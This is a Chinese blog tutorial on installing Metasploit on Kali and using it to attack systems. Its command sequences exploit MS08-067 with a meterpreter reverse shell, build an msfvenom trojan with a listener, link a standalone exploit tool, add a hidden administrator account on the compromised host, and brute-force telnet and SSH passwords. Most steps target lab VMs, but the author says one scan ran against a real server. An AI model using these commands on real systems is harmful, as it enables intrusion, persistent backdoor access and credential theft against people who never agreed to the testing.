美文网首页Linux
64.Linux metasploit安装及使用

64.Linux metasploit安装及使用

作者: 扶桑啊啊 | 来源:发表于2018-11-27 17:31 被阅读0次

    渗透测试框架Metasploit功能众多,它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。
    一、安装metasploit
    在kali系统使用metasploit时,启动发生故障,所以将其卸载重装

    apt-get remove metasploit-framework
    apt-get install metasploit-framework
    

    重装失败,显示找不到需要的软件,更换source源后重新安装。

    vim /etc/apt/sources.list
      添加这两行
      deb http://http.kali.org/kali kali-rolling main contrib non-free
      deb-src http://http.kali.org/kali kali-rolling main contrib non-free
    apt-get update
    apt-get install metasploit-framework
    

    安装成功。
    启动:


    成功启动

    二、metasploit利用系统漏洞进行攻击

    msfconsole
    >show
    >use exploit/windows/smb/ms08_067_netapi
    >show options
    >set RHOST 192.168.252.131    //RHOST是目标地址
    >set PAYLOAD windows/meterpreter/reverse_tcp
    >set LHOST 192.168.252.136
    >exploit   //或run,用来执行,本例执行肯定不成功,因为ms08_067是windows漏洞,我131上装的是centos。只是用来演示一下过程
    
    image.png
    image.png
    image.png
    image.png
    image.png

    ps:windows MS08067漏洞介绍
    MS08067远程溢出漏洞是由于windows系统中RPC存在缺陷造成的,windows系统的server服务在处理特别RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
    1.工具——MS08067.exe 攻击命令MS08067.exe 192.168.1.3,向远程主机发送一串特殊构造的数据包,使目标主机产生内存溢出,程序跳转到shellcode代码处执行,shellcode代码在目标主机上开启4444端口,等待连接;
    工具下载:https://pan.baidu.com/s/1WD6GOT_gTBm6Ahyk45jmRg
    提取码:6cfu
    也可以使用像上面一样使用metasploit进行攻击测试。
    2.连接远程主机并添加用户 telnet 192.168.1.3 4444
    成功连接目标主机,输入命令ipconfig
    添加用户 net user aaa 123456 /add
    把用户aaa添加到管理员组 net localgroup administrators aaa /add
    确认aaa是否在管理员组 net user aaa
    3.用户aaa远程连接目标主机 开始——运行——mstsc ,输入ip、账号、密码


    三、使用metasploit自己制作木马,并利用起来
    1.根据自己的ip生成一个木马

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.252.136 lPORT=55555 X >test.ext
    

    2.将制作好的test.exe文件发送到靶机上(需要windows xp或03系统)
    3.使用

    use exploit/multi/handler   //使用handle模块
    set PAYLOAD windows/meterpreter/reverse_tcp   //使用这个shellcode
    set LHOST 192.168.252.136
    set LPORT 55555
    exploit   //打开后,在靶机上双击test.exe,监测
    

    四、使用metasploit扫描弱口令

    use auxiliary/scanner/telnet/telnet_login  //使用telnet爆破模块
    set user_file user.txt   //设置用户名字典
    set pass_file user.txt  //设置密码字典
    set rhosts IP   //我这里用的是真实的服务器地址,所以马掉了
    run
    

    尝试爆破telnet弱口令


    1543310508(1).jpg

    五、使用metasploit爆破ssh弱口令
    本机ip:192.168.252.136
    靶机ip:192.168.252.128
    事先编辑好账号字典user.txt和密码字典password.txt
    故意在靶机上设置弱口令root:ll123456和dazhutizi:123.
    尝试爆破

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
    user_file => user.txt
    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
    user_file => user.txt
    msf auxiliary(scanner/ssh/ssh_login) > show options
    msf auxiliary(scanner/ssh/ssh_login) > run
    
    爆出root账号
    但是普通用户dazhutizi的密码却没有爆出来,仔细查看结果,发现原来我之前在128上做了设置,使远程登录输错三次密码后将用户进行锁定==
    image.png
    按照我编辑的账号和密码本,root刚好尝试了三次就登录成功了,而其他普通用户都被锁定了==(锁定方法:https://www.jianshu.com/p/8c69cc00bbff
    普通用户被锁定
    将其解锁,再尝试成功
    参考:http://www.freebuf.com/sectool/67685.html
    metasploit使用命令参考:https://www.cnblogs.com/lsgxeva/p/8450277.html

    相关文章

      网友评论

        本文标题:64.Linux metasploit安装及使用

        本文链接:https://www.haomeiwen.com/subject/hgvpaftx.html